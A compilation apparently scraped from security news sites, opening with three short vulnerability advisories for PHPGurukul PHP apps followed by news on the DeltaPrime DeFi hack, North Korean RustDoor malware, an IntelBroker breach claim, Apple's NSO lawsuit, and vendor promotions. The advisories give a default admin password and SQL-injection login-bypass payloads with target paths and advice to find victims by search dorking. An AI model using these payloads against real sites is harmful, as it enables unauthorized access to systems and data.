COVID19 Testing Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : COVID19 - Testing Management System 1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/covid-tms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

COVID19 Testing Management System 1.0 Insecure Settings

BP Monitoring Management System version 1.0 version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BP Monitoring Management System 1.0 Auth By Pass Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = 'or''='@gmail.com & PASs : ' or 0=0 ##[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

BP Monitoring Management System 1.0 SQL Injection

Auto/Taxi Stand Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 Auth By Pass Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/atsms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Auto/Taxi Stand Management System 1.0 SQL Injection

DeltaPrime DeFi platform suffers a $5.98M hack on the Arbitrum chain due to a private key leak. The attack compromised several liquidity pools, and the team is working on asset recovery and minimizing user losses.

In the early hours of September 16, 2024, DeltaPrime, a prominent decentralized finance (**DeFi**) platform, announced that its Arbitrum-based protocol, DeltaPrime Blue, was exploited in a cyber attack that drained approximately $5.98 million.

According to an official tweet from DeltaPrime at 9:55 AM, the exploit occurred at 6:14 AM CET and was traced to a compromised private key. The team reassured users that the issue is limited to the **Arbitrum chain**, with the Avalanche-based DeltaPrime Red unaffected due to its use of multisig wallets and cold storage for added security.

The company emphasized that they are actively working on asset retrieval and that the platform’s insurance pool is expected to cover losses where possible. Additionally, DeltaPrime is exploring further measures to minimize user losses, pledging ongoing updates through social media and Discord.

> DeltaPrime Blue exploited, this is the current status:
> 
> At 6:14 AM CET DeltaPrime Blue (Arbitrum) was attacked and drained for $5.98M. This was due to a compromised private key, the source of which is currently under investigation.
> 
> DeltaPrime Red (Avalanche) is not vulnerable…
> 
> — DeltaPrime (@DeltaPrimeDefi) September 16, 2024

The attack was first flagged by Cyvers Alerts, a blockchain security platform, which detected suspicious transactions related to DeltaPrime Blue on the Arbitrum chain. In a tweet at 7:36 AM, Cyvers reported multiple suspicious transactions draining liquidity pools, such as DPUSDC, DPARB, and DPBTCb.

They noted that the attacker had already swapped large amounts of USDC for ETH, with the total loss estimated at $4.5 million at the time. An hour later, Cyvers updated their estimate, stating that the losses had increased to $5.93 million, confirming that the attacker had taken control of the private key for DeltaPrime’s admin wallet, allowing them to upgrade proxy contracts and direct them to malicious ones.

> 🚨ALERT🚨@DeltaPrimeDefi has faced a security incident on their admin keys.  
> Attacker had control on the private key of 0x40e4ff9e018462ce71fa34abdfa27b8c5e2b1afb  
> then he upgraded the proxy!
> 
> So far $5.93M has been drained!
> 
> Want to keep your company off our alerts radar? Learn… https://t.co/yOmNZJyp5l pic.twitter.com/lztFvXVmfI
> 
> — 🚨 Cyvers Alerts 🚨 (@CyversAlerts) September 16, 2024

In a comment to Hackread.com, **Meir Dolev,** CTO of CyVers stated _“_The hacker took control of the admin wallet for DeltaPrime’s proxy contracts, later upgrading these contracts to point to his malicious contract, which enabled the draining of the pools on the Arbitrum chain. The total loss is around $5.9 million USD._“_

As the investigation continues, DeltaPrime assures users that their funds on Avalanche remain secure, while they focus on resolving the situation on Arbitrum. Stay tuned, this article will be updated accordingly.

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Crypto Scammer Returns $9.27M Out of $24M Crypto Theft**
3.  **Crypto Exchange FixedFloat Hacked: $26M in BTC, ETH Stolen**
4.  **Hackers Stole $59M of Crypto Via Malicious Google and X Ads**
5.  **Crypto losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed**

DeltaPrime Suffers $5.98M Loss as Hacker Exploits Admin Key on Arbitrum

Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target prospective victims on LinkedIn to deliver malware called RustDoor.
The latest advisory comes from Jamf Threat Labs, which said it spotted an attack attempt in which a user was contacted on the professional social network by claiming to be a recruiter for a legitimate decentralized

Financial Security / Malware

Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target prospective victims on LinkedIn to deliver malware called RustDoor.

The latest advisory comes from Jamf Threat Labs, which said it spotted an attack attempt in which a user was contacted on the professional social network by claiming to be a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.

The malicious cyber activity is part of a multi-pronged campaign unleashed by cyber threat actors backed by the Democratic People's Republic of Korea (DPRK) to infiltrate networks of interest under the pretext of conducting interviews or coding assignments.

The financial and cryptocurrency sectors are among the top targets for the state-sponsored adversaries seeking to generate illicit revenues and meet an ever-evolving set of objectives based on the regime's interests.

These attacks manifest in the form of "highly tailored, difficult-to-detect social engineering campaigns" aimed at employees of decentralized finance ("DeFi"), cryptocurrency, and similar businesses, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in an advisory.

One of the notable indicators of North Korean social engineering activity relates to requests to execute code or download applications on company-owned devices, or devices that have access to a company's internal network.

Another aspect worth mentioning is that such attacks also involve "requests to conduct a 'pre-employment test' or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories."

Instances featuring such tactics have been extensively documented in recent weeks, underscoring a persistent evolution of the tools used in these campaigns against targets.

The latest attack chain detected by Jamf entails tricking the victim into downloading a booby-trapped Visual Studio project as part of a purported coding challenge that embeds within it bash commands to download two different second-stage payloads ("VisualStudioHelper" and "zsh\_env") with identical functionality.

This stage two malware is RustDoor, which the company is tracking as Thiefbucket. As of writing, none of the anti-malware engines have flagged the zipped coding test file as malicious. It was uploaded to the VirusTotal platform on August 7, 2024.

"The config files embedded within the two separate malware samples shows that the VisualStudioHelper will persist via cron while zsh\_env will persist via the zshrc file," researchers Jaron Bradley and Ferdous Saljooki said.

RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 in connection with a malware campaign targeting cryptocurrency firms. A subsequent analysis by S2W uncovered a Golang variant dubbed GateDoor that's meant for infecting Windows machines.

The findings from Jamf are significant, not only because they mark the first time the malware has been formally attributed to North Korean threat actors, but also for the fact that the malware is written in Objective-C.

VisualStudioHelper is also designed to act as an information stealer by harvesting files specified in the configuration, but only after prompting the user to enter their system password by masquerading it as though it's originating from the Visual Studio app to avoid raising suspicion.

Both the payloads, however, operate as a backdoor and use two different servers for command-and-control (C2) communications.

"Threat actors continue to remain vigilant in finding new ways to pursue those in the crypto industry," the researchers said. "It's important to train your employees, including your developers, to be hesitant to trust those who connect on social media and ask users to run software of any type.

"These social engineering schemes performed by the DPRK come from those who are well-versed in English and enter the conversation having well researched their target."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware

Imagine this... You arrive at work to a chaotic scene. Systems are down, panic is in the air. The culprit? Not a rogue virus, but a compromised identity. The attacker is inside your walls, masquerading as a trusted user. This isn't a horror movie, it's the new reality of cybercrime. The question is, are you prepared?
Traditional incident response plans are like old maps in a new world. They

Identity Protection / Incident Response

**Imagine this...** You arrive at work to a chaotic scene. Systems are down, panic is in the air. The culprit? Not a rogue virus, but a compromised identity. The attacker is _inside_ your walls, masquerading as a trusted user. This isn't a horror movie, it's the new reality of cybercrime. The question is, are you prepared?

Traditional incident response plans are like old maps in a new world. They focus on malware and network breaches, but today's criminals are after your identities. Stolen credentials, and weak access points - these are the keys to your kingdom.

While there's a playbook for handling malware outbreaks, the 'identity' chapter is often missing. Organizations struggle to identify compromised accounts and stop attackers from moving laterally within their systems. The result? A breach that spirals out of control, causing massive damage.

**The Solution: An Identity-Focused Incident Response Playbook**

This isn't just another security buzzword, it's your lifeline in the face of an identity attack. It provides clear procedures, tools, and strategies to detect, contain, and recover from an identity breach.

**In this webinar, you'll discover:**

*   **Why identity is the new frontline in the cyberwar:** Understand the shift in attacker tactics and why traditional defenses are falling short.
*   **The latest tactics attackers use to compromise accounts:** Learn about phishing, credential stuffing, and other sophisticated methods used to steal identities.
*   **Proven strategies for rapid detection and containment:** Discover how to quickly identify compromised accounts and stop attackers in their tracks.
*   **How to create an Identity IR Playbook tailored to your organization:** Get practical guidance on building a playbook that aligns with your specific needs and resources.

**Who should attend:**

*   IT security professionals
*   Incident response teams
*   CIOs and CISOs
*   Anyone responsible for protecting their organization's sensitive data

Secure your spot now and learn how to safeguard your identities against today's most pressing threats.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

From Breach to Recovery: Designing an Identity-Focused Incident Response Playbook

The PCI DSS landscape is evolving rapidly. With the Q1 2025 deadline looming ever larger, businesses are scrambling to meet the stringent new requirements of PCI DSS v4.0. Two sections in particular, 6.4.3 and 11.6.1, are troublesome as they demand that organizations rigorously monitor and manage payment page scripts and use a robust change detection mechanism. With the deadline fast approaching

Payment Security / Data Protection

**The PCI DSS landscape is evolving rapidly.** With the Q1 2025 deadline looming ever larger, businesses are scrambling to meet the stringent new requirements of PCI DSS v4.0. Two sections in particular, 6.4.3 and 11.6.1, are troublesome as they demand that organizations rigorously monitor and manage payment page scripts and use a robust change detection mechanism. With the deadline fast approaching and the consequences of non-compliance so severe, there is no room for complacency, so, in this article, we look at the best way to meet these complex coding requirements.

**PCI DSS v4: Understanding Requirements 6.4.3 and 11.6.1**

These changes to PCI DSS in v4.0 acknowledge the urgent need to tighten client-side security in the face of pervasive supply-chain threats. They call for beefed-up payment page security to keep customers' sensitive payment details safe from malicious script injection attacks:

*   6.4.3: To meet this requirement your organization needs to monitor and manage all payment page scripts executed in the consumer's browser. This includes ensuring that scripts are authorized, their integrity is maintained, and that you keep an inventory that lists each one with written justifications for their inclusion.

*   11.6.1: This requirement focuses on detecting script changes and preventing tampering, so organizations will need to implement a mechanism to promptly detect unauthorized modifications to the security-critical HTTP headers and scripts used on payment pages. This will help to prevent malicious code injection and other attacks that target payment data.

**A Proprietary PCI Dashboard**

Reflectiz was aware that traditional PCI compliance methods can often be time-consuming and resource-intensive, so they created a dedicated PCI dashboard that generates them with a minimum of fuss. It provides real-time, remote visibility into your online ecosystem, with script-level monitoring and no need for on-site resources, so compliance is baked in, and compliance reporting is very straightforward, because it's like a natural by-product of what the solution is already doing.

**Get access to a 30-day free PCI Dashboard.**

**Simplify Compliance with Smart Approvals**

Reflectiz's smart approval mechanism is another time-saver. Instead of manually approving and justifying each script, you can simply define acceptable script behaviors and then let the system automatically batch-approve the ones that meet them.

You can still approve and justify individual script changes when necessary, but having the option to streamline the approval process by defining acceptable script behaviors in this way is a liberating additional feature. It extends to managing approvals for websites with multiple payment pages, too, which is even better.

To summarize:

*   **Script Approvals:** Easily approve and justify individual script changes to meet requirements 6.4.3 and 11.6.1.
*   **Smart Approval Mechanism:** Streamline the approval process by defining acceptable script behaviors.
*   **Multiple Payment Page Management:** Efficiently manage approvals for websites with multiple payment pages.

The benefits of using Reflectiz's PCI dashboard soon add up.

*   **Time savings:** Automate manual processes, freeing up your team to focus on core business activities.**Recently, Reflectiz reduced the level of work needed for one of its customers by 95%(!)** See case study below.
*   **Cost reduction:** Reduce the overhead associated with compliance efforts, including personnel and resources.
*   **Reduced risk of non-compliance:** Stay ahead of PCI DSS requirements and minimize the risk of costly penalties and reputational damage.

Using security solutions that rely on embedded JavaScript can add more vulnerabilities (including OWASP top ten vulnerabilities) than they fix, like trying to fight fires with gasoline. Reflectiz operates remotely, which gives it an uninterrupted view of every script on the page with no chance of compromise and no extra vulnerabilities added. The last place you should be introducing JavaScript vulnerabilities is a payment page, so Reflectiz takes the far safer and more effective route to PCI compliance of monitoring them remotely.

**Access your 30-day free PCI Dashboard.**

**Why Reflectiz Chose Remote Monitoring Over Embedded Scripts**

**Embedded security scripts add significant drawbacks:**

*   **Privacy concerns:** They can access your business and user data, adding an ongoing burden to your compliance efforts.
*   **Limited visibility:** They can't monitor critical areas like iFrames, user hijacking, and tracking cookies. These are invisible to them.
*   **Performance impact:** They slow down websites and require constant updates.
*   **Security risks:** They're vulnerable to attacks and they increase the overall attack surface.

Reflectiz's remote monitoring approach overcomes these challenges by providing comprehensive, secure, and efficient oversight of web components.

Stuart Golding, a leading PCI DSS Qualified Security Assessor, shares the view that this is the right approach: _"Personally, I tend to favor solutions that are least intrusive, both in terms of cost and implementation. These solutions typically require minimal development or changes to the organization's webpage, allowing for quick implementation and results."_

**Case Study: A Major US Insurance Company**

**Challenge**: A major US insurance company needed to comply with the new PCI DSS v4.0 requirements, specifically 6.4.3 and 11.6.1, which, as we've noted, mandate rigorous monitoring and management of payment page scripts. The company had:

*   2 payment pages
*   Approximately 60 scripts across both pages

**Solution**: The company implemented Reflectiz's PCI dashboard to streamline script monitoring and approval during a two-week period.

**Results**:

**Breakdown**:

**Key Takeaways**:

*   Reflectiz identified a significant number of script changes (30% in just two weeks) highlighting the need for continuous monitoring.
*   Projecting this data onto a larger scale (8 payment pages), Reflectiz can potentially save the company from reviewing and approving 40 scripts every week.
*   By automating approvals and minimizing manual effort, Reflectiz reduces the risk of human error and streamlines the compliance process. This translates to significant cost savings and a smoother path to passing PCI audits.

This case study demonstrates the efficiency and effectiveness of Reflectiz in managing script changes and ensuring PCI DSS compliance.

**Beyond PCI Compliance**

PCI compliance is only one aspect of Reflectiz's comprehensive set of web security features. By monitoring third-party web components, tracking data access to payment and credit card information, and maintaining a complete inventory of third- and fourth-party scripts, Reflectiz helps organizations achieve and maintain PCI DSS v4.0 compliance while strengthening their overall web security posture.

**Access your 30-day free PCI Dashboard.**

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Master Your PCI DSS v4 Compliance with Innovative Smart Approvals

A hacker known as IntelBroker claims to have breached the UK-based company Experience Engine, allegedly exposing sensitive data.…

A hacker known as IntelBroker claims to have breached the UK-based company Experience Engine, allegedly exposing sensitive data. The hacker is selling the data on an online forum, raising concerns about data security for affected clients and businesses.

The notorious IntelBroker hacker has claimed responsibility for breaching Experience Engine, a UK-based company that provides experiential marketing and promotional staffing services. The hacker, who was previously linked to several high-profile data breaches, is now selling the allegedly stolen data on Breach Forums, demanding payment in **Monero** (XML) cryptocurrency to remain anonymous and untraceable.

****Who is Experience Engine?****

Experience Engine, founded over 20 years ago, specializes in creating experiential marketing and promotional staffing solutions. With a global reach and a client base that includes major corporations; they work across sectors such as tech, public sectors, and fast-moving consumer goods (FMCG) brands, offering a network of over 1,200 “Experience Engineers™.”

These professionals are tech-trained to help businesses engage with customers through activations, events, and brand ambassador roles. The company claims to offer access to over 200,000 properties worldwide, focusing on integrating campaigns and humanizing complex technological messages for brands.

Screenshot from Experience Engine’s website highlighting its portfolio

****The Alleged Breach****

According to IntelBroker, the breach occurred in September and involves a trove of sensitive data. The hacker is also offering to sell entire .bak database files, which contain a large amount of client and transactional information. IntelBroker has even provided sample data, which includes details from tables such as dbo.invoice and dbo.booking_backup, containing thousands of rows of sensitive records.

One of the notable tables, dbo.invoice, includes 31,000 rows of data, with fields such as InvoiceID, InvoiceNumber, and InvoiceDate, alongside client-specific information such as contact details and invoice amounts. For instance, one invoice dated October 3, 2006, references Thomas Cook, a now-defunct global travel group, headquartered in the United Kingdom with payment details and banking information related to a booking at the now permanently closed Thirty Thirty New York City Hotel.

InterBorken hacker on Breach Forums (Screenshot: Hackread.com)

Another table, dbo.booking_backup, contains 784,000 rows of data, featuring sensitive customer information such as names, addresses, emails, booking histories, and revenue data. Among the entries are details of clients from the UK, United States, and Saint Lucia, with personal information, email addresses, and booking records all included.

The data sample provided by IntelBroker reveals alarming details of the alleged breach. The exposed data includes highly sensitive information, including financial transactions, customer contact details, and bank account numbers.

For instance, a sample from the dbo.invoice table analyzed by the Hackread.com research team shows details of an invoice amounting to $4699.36, with full banking details for the recipient. The booking records reveal customer names, addresses, and even room revenue from bookings, which can put individuals’ privacy and financial security at risk.

Moreover, the nature of the alleged data breach suggests that Experience Engine’s security protocols may have been insufficient to prevent this large-scale leak. Given that the company manages promotional staffing and experiential campaigns for global brands, the impact on their reputation could be severe.

****IntelBroker’s Dark History****

IntelBroker is no stranger to the hacking world. The hacker has been linked to several high-profile breaches, including the following organisations:

*   **Europol**
*   **Tech in Asia**
*   **Space-Eyes**
*   **Home Depot**
*   **Facebook Marketplace**
*   **U.S. contractor Acuity Inc.**
*   **Staffing giant Robert Half**
*   **Los Angeles International Airport**
*   **Alleged breaches of HSBC and Barclays Bank**

Although the hacker’s origins and affiliates are unknown, according to the United States government, IntelBroker is alleged to be the perpetrator behind one of the **T-Mobile data breaches**.

(Screenshot: Hackread.com)

The alleged breach of Experience Engine adds another company to IntelBroker’s cybercrime portfolio. With millions of sensitive records potentially exposed, the fallout from this breach could have long-lasting consequences.

Hackread.com has reached out to Experience Engine for comment. If and when the company responds the article will be updated accordingly. Stay tuned!

1.  **UK’s Freecycle Data Breach Impacts 7 Million Users**
2.  **Exposed ICS in the US, and UK Threaten Water Supplies**
3.  **NCA Arrests Teenager in Walsall Over TfL Cyber Attack**
4.  **IntelBroker Apple Breach: Steals Source Code for Internal Tools**
5.  **UK Criminal Records Office Down in Potential Ransomware Attack**

Hacker Claims Breach of UK’s Experience Engine, Data Sold Online

Apple has filed a motion to "voluntarily" dismiss its lawsuit against commercial spyware vendor NSO Group, citing a shifting risk landscape that could lead to exposure of critical "threat intelligence" information.
The development was first reported by The Washington Post on Friday.
The iPhone maker said its efforts, coupled with those of others in the industry and national governments to tackle

Spyware / Threat Intelligence

Apple has filed a motion to "voluntarily" dismiss its lawsuit against commercial spyware vendor NSO Group, citing a shifting risk landscape that could lead to exposure of critical "threat intelligence" information.

The development was first reported by The Washington Post on Friday.

The iPhone maker said its efforts, coupled with those of others in the industry and national governments to tackle the rise of commercial spyware, have "substantially weakened" the defendants.

"At the same time, unfortunately, other malicious actors have arisen in the commercial spyware industry," the company said. "It is because of this combination of factors that Apple now seeks voluntary dismissal of this case."

"While Apple continues to believe in the merits of its claims, it has also determined that proceeding further with this case has the potential to put vital security information at risk."

Apple originally filed the lawsuit against the Israeli company in November 2021 in an attempt to hold it accountable for illegally targeting users with its Pegasus surveillance tool.

It described NSO Group, a subsidiary of Q Cyber Technologies Limited, as "amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery that invites routine and flagrant abuse."

Earlier this January, a federal judge denied a motion from NSO Group to dismiss the lawsuit under the grounds that the company is "based in Israel and Apple should have sued them there," with the court stating that "the anti-hacking purpose of the CFAA fits Apple's allegations to a T, and NSO has not shown otherwise."

In its motion for voluntary dismissal, Apple said three major developments have been a contributing factor: The risk that the threat intelligence information it has developed to protect users against spyware attacks could be exposed, pointing to a July 25, 2024, report from The Guardian.

The British newspaper revealed that Israeli officials had seized documents from NSO Group in July 2020 in an apparent effort to stop the handover of information about the notorious hacking tool as part of the company's ongoing legal tussle with Meta-owned WhatsApp, which filed a similar lawsuit in 2019.

"The seizures were part of an unusual legal maneuver created by Israel to block the disclosure of information about Pegasus, which the government believed would cause 'serious diplomatic and security damage' to the country," The Guardian noted at the time.

Apple also cited as reasons for changing dynamics in the commercial spyware industry and the proliferation of different spyware companies, as well as the possibility of revealing to third-parties "the information Apple uses to defeat spyware while defendants and others create significant obstacles to obtaining an effective remedy."

The development comes as the Atlantic Council divulged that the individuals behind some of the spyware vendors in Israel, Italy, and India that have come under the scanner for enabling authoritarian regimes to spy on human rights advocates, opposition leaders, and journalists have sought to rename them, start new ones, or undertake strategic jurisdiction hopping.

Case in point, Intellexa, the now-sanctioned company behind the Predator spyware, has resurfaced with new infrastructure in connection with its ongoing use by likely customers in countries such as Angola, the Democratic Republic of the Congo (DRC), and Saudi Arabia.

"Predator's operators have significantly enhanced their infrastructure, adding layers of complexity to evade detection," the cybersecurity company's Insikt Group said.

"The new infrastructure includes an additional tier in its multi-tiered delivery system, which anonymizes customer operations, making it even harder to identify which countries are using the spyware."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Drops Spyware Case Against NSO Group, Citing Risk of Threat Intelligence Exposure

A list of topics we covered in the week of September 9 to September 15 of 2024

September 13, 2024 - Car manufacturer Ford Motor Company has filed a patent application for an in-vehicle advertisement presentation system based on information derived from...

September 12, 2024 - Meta has admitted to scraping Australian Facebook user's public photos, posts and other data to train its AI models, including those of kids on adult profiles.

September 12, 2024 - We dug into PartnerLeak, the site behind the "your partner is cheating on you" emails, including how and where the scammers get their information.

September 10, 2024 - Payment gateway provider Slim CD has notified 1.7 million users that their credit card information may have been leaked.

September 10, 2024 - Scammers are now throwing in the name of the partner of the targeted victim, telling them that their partner is cheating on them.

Latest News